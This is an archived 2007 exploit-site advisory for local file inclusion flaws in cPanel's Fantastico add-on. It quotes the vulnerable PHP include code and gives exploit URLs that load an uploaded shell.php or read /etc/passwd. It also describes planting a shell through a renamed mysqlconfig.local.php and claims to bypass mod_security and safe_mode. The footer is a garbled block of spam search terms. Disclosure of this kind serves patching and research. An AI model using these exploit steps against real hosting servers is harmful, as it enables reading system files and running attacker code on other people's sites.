about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities



2007-03-11 cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
Rated as : High Risk

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
       include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath .
"/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
       {
       include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###################################################


Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

securitydot.net - 2007-03-11

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 16:44:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
IceWarp We www.petard news for c www.image. WWW AMERIC www.pamela mod_phyton www sextv 200+%252Fc php-nuke+2 200 ///man www.dongyi bollywood I agree wi Www indian w ww.kar20 sjvpn.taob www.yoneed Xxxindia s www.00868. www.zjdts. Ancient wa www.wapbea Gadis bugi xxxsexyvid WWW.GIRLSA barebacked www.110pc. ydp.ha.cn www.hz61.c news for c 200 /compo saniamirza Www.seasex CMS is Fre PHP URL En Scorpio ni www.sw0318 BBS.moshou www.sexyti www.taoksh CMS is Fre OPenssl jogos hola squid/2.6. sxzg.net php-nuke 2 Www.Freese mambamovie news for c